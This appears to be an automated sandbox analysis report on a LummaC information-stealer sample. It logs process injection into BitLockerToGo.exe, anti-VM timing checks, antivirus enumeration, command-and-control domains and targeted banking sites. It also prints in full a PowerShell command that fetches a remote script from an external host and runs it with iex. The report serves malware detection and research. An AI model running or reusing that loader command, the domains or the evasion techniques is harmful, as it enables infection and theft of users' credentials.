              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSystem information queried: FirmwareTableInformationJump to behavior
              Switches to a custom stack to bypass stack traces
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeAPI/Special instruction interceptor: Address: 6BBF7C44
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BBFF3E1 second address: 6BBFF3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeRDTSC instruction interceptor: First address: 6BBFF3FD second address: 6BBFF3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007FB9C0CB3BC5h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007FB9C0CB3C50h 0x00000031 rdtsc
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5031Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1731Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V3A6I.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0FNEB.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-0FNEB.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-V3A6I.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5660Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep count: 5031 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep count: 1731 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3524Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4980Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3836Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: BitLockerToGo.exe, 00000003.00000003.2617535427.00000000004C7000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.000000000049C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2753117538.00000000004C7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: MdhO83N5Fm.exe, 00000000.00000002.2319692998.0000000002E4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: BitLockerToGo.exe, 00000003.00000003.2408023858.0000000004AAD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Allocates memory in foreign processes
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeMemory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and writeJump to behavior
              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeNtQuerySystemInformation: Direct from: 0x4585B0
              Injects a PE file into a foreign processes
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5AJump to behavior
              LummaC encrypted strings found
              Source: MdhO83N5Fm.exe, 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
              Source: MdhO83N5Fm.exe, 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
              Source: MdhO83N5Fm.exe, 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
              Source: MdhO83N5Fm.exe, 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
              Source: MdhO83N5Fm.exe, 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
              Source: MdhO83N5Fm.exe, 00000000.00000002.2323002788.000000000C04A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: simplerapplau.click
              Writes to foreign memory regions
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 28B008Jump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000Jump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000Jump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 43F000Jump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 442000Jump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 452000Jump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeMemory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 453000Jump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-B6SUS.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe "C:\Users\user\AppData\Local\Temp\MBL4EF1WJ27Y40L4B4G3AI.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-FKJO0.tmp\MBL4EF1WJ27Y40L4B4G3AI.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content;
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; Jump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeQueries volume information: C:\Users\user\Desktop\MdhO83N5Fm.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\MdhO83N5Fm.exeQueries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformationJump to behavior
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeQueries volume information: C:\Users\user\AppData\Local\Temp\fe64937f VolumeInformation
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeCode function: 37_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,37_2_00491486
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: BitLockerToGo.exe, 00000003.00000003.2617535427.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2754752871.00000000004B0000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2756419053.00000000004B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 5284, type: MEMORYSTR
